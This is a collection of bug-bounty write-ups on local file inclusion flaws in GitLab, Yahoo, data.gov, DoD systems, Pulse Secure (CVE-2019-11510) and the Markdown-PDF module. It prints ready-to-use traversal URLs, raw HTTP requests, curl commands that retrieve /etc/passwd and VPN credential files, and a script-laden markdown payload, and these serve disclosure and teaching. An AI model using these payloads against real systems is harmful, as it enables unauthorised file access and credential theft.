Local File Inclusion Writeups

Gitlab

Researcher discovered LFI on Gitlab when transferring an issue to a project. By creating an issue in project A with the following payload in the description:

![a](/uploads/11111111111111111111111111111111/../../../../../../../../../../../../../../etc/passwd)

Then transferring that issue from Project A to Project B, this copies the /etc/passwd file to Project B.

Researcher PoC:

The issue occurs on the UploadsRewriter controller. This controller does not validate the file name or path, allowing arbitrary files to be copied using file traversal when moving an issue to another project.

  @text.gsub(@pattern) do |markdown|
          file = find_file(@source_project, $~[:secret], $~[:file])
          break markdown unless file.try(:exists?)

          klass = target_parent.is_a?(Namespace) ? NamespaceFileUploader : FileUploader
          moved = klass.copy_to(file, target_parent)
...
   def find_file(project, secret, file)
        uploader = FileUploader.new(project, secret: secret)
        uploader.retrieve_from_store!(file)
        uploader
      end

Yahoo - URL sub parameter

Requesting a download for any file on https://brandtoolkit.yahoo.com/ will return a download popup. The URL for the popup is marketing-dam.yahoo.com/DLMExt/DLAgent?dlurl=. The dlurl parameter contains a URL encoded string 8lcO%3A%2F%2F0w.QbN.0.*Q%3Anbbn0%2FPSID%3Fz8A%3DAxT_DIfP7_UO9Y6I_hD67IdcI%26Ujd%3DlpxBXLmiKWMPRwUsLpu8cZ%26hj%3DaR9UU_hI-q5_UjP.W7U When this is URL decoded three sub parameters are visible z8A, Ujd and hj.

8lcO://0w.QbN.0.*Q:nbbn0/PSID?z8A=AxT_DIfP7_UO9Y6I_hD67IdcI&Ujd=lpxBXLmiKWMPRwUsLpu8cZ&hj=aR9UU_hI-q5_UjP.W7U

The vulnerable parameter to LFI is hj. This parameter is encoded with ecb-encryption with a blocksize of 32 characters-. The researcher wrote a PoC to decrypt/encrypt a string, for convenience researcher provided following payload: /../../../../../../../../etc/passwd and encrypted /../../../../../../../../79d/zGcIwd.

Using the above encrypted payload in the full URL it is possible to retrieve the /etc/passwd file. Full URL with payload:

https://marketing-dam.yahoo.com/DLMExt/DLAgent?dlurl=8lcO%3A%2F%2F0w.QbN.0.%2AQ%3Anbbn0%2FPSID%3Fz8A%3DAxT_DIfP7_UO9Y6I_hD67IdcI%26Ujd%3DlpxBXLmiKWMPRwUsLpu8cZ%26hj%3D%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F79d%2FzGcIwd

TTS (labs.data.gov)

Researcher discovered limited LFI on endpoint https://labs.data.gov/dashboard/Docs/index, by appending dot-dot-slash URL encoded followed by README it is possible to extract the Readme.md file.

Full URL payload https://labs.data.gov/dashboard/Docs/index/..%2fREADME

Viewing the Readme.md file using LFI in the URL

The LFI is limited to markdown files. In the code below which controls this functionality the index function in Docs class uses the page parameter which is set in the URL (which researched modified with payload). Then the document path is formed in line 7 which combines the docs_path variable with the user supplied page variable then appended with .md. The markdown string concatenation appendage prevents any other file but markdown from being retrieved.

 public function index($page = 'main')
    {

        $data = array();

        $docs_path = ($this->config->item('docs_path')) ? $this->config->item('docs_path') : 'https://raw.githubusercontent.com/GSA/project-open-data-dashboard/master/documentation/';
        $docs_path = $docs_path . $page . '.md';
        $docs = @file_get_contents($docs_path);

DoD LFI

URL LFI using Directory Traversal / Path Traversal with dot-dot-slash characters that are URL encoded to retrieve files from the target system. Retrieving the c:/windows/System32/drivers/etc/hosts as a POC:

GET /gwtmain//..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows/System32/drivers/etc/hosts HTTP/1.1
Host: ██████████
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close

The URL with payload can also just be pasted into a browser:

https://███████/gwtmain//..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows/System32/drivers/etc/hosts

Attempting to retrieve Users/Administrator/NTUser.dat to determine if the application is running as an administrator account:

GET /gwtmain//..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fUsers/Administrator/NTUser.dat HTTP/1.1
Host: ████
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close

DoD Pulse Secure LFI (CVE-2019-11510)

Researcher discovered vulnerable Pulse Secure SSL VPN server that did not have the patch for CVE-2019-11510. This vulnerability allows an attacker to retrieve backend files such as /etc/passwd. The other files targeted by attackers are the database file /runtime/mtmp/lmdb/dataa/data.mdb which contains usernames and passwords. These credentials could be used to authenticate to the SSL VPN and conduct post breach activities.

//Retrieve the /etc/passwd file 
curl --path-as-is -s -k "$URL/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/"

//Retrieve the /runtime/mtmp/Imdb/dataa/data.mdb file 
curl --path-as-is -s -k "$URL/dana-na/../dana/html5acc/guacamole/../../../../../../../data/runtime/mtmp/lmdb/dataa/data.mdb?/dana/html5acc/guacamole/"

DoD

Researcher discovered LFI on a DoD application's registration page. The HTTP form body parameter registerUserInfoCommand.nextPageName is vulnerable to LFI, when entering the payload ..%2f..%2f..%2fWEB-INF%2fweb.xml which returns the web.xml file to the user.

Full HTTP body parameters with payload in registerUserInfoCommand.nextPageName:

registerUserInfoCommand.organization=Chantest+Corporation&registerUserInfoCommand.organizationId=49800&registerUserInfoCommand.currPageName=SearchUserOrgInfo.jsp&registerUserInfoCommand.nextPageName=..%2f..%2f..%2fWEB-INF%2fweb.xml&registerUserInfoCommand.prevPageName=jsp%2FRegistration%2FRegisterAccountInfo.jsp&registerUserInfoCommand.submitButton=Choose+This+Organization+and+Continue+%3E

Researcher retrieved the following files:

/WEB-INF/spring/mvc-config.xml
/WEB-INF/spring/rest-config.xml
/WEB-INF/classes/compliance/reports/adminRpt.pre.sql
/WEB-INF/classes/compliance/reports/adminRpt.full.sql
/WEB-INF/classes/compliance/reports/complianceStatusRptSql.sql
/WEB-INF/classes/████.properties

With the last file containing database credentials:

Test.DB.URL=jdbc:oracle:thin:@localhost:1521:XE
Test.DB.username=██████████
Test.DB.password=██████

Markdown-PDF: 3rd Party Node Module

Researcher discovered LFI on a 3rd party Node.js module Markdown-PDF. This module converts markdown to pdf, however it firsts converts markdown to html5 boilerplate in index.html then PhantomJS renders the HTML and saves it to PDF. By rendering the HTML server-side before converting, this allows the input of a malicious markdown file which can retrieve local files. Illustrated below, uploading the markdown file below (test.md) will use document.write to write the contents of /etc/passwd to the markdown which will be returned to the end user after PDF conversion:

# this is h1
<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open("GET","file:///etc/passwd");x.send();</script>

Last updated

Was this helpful?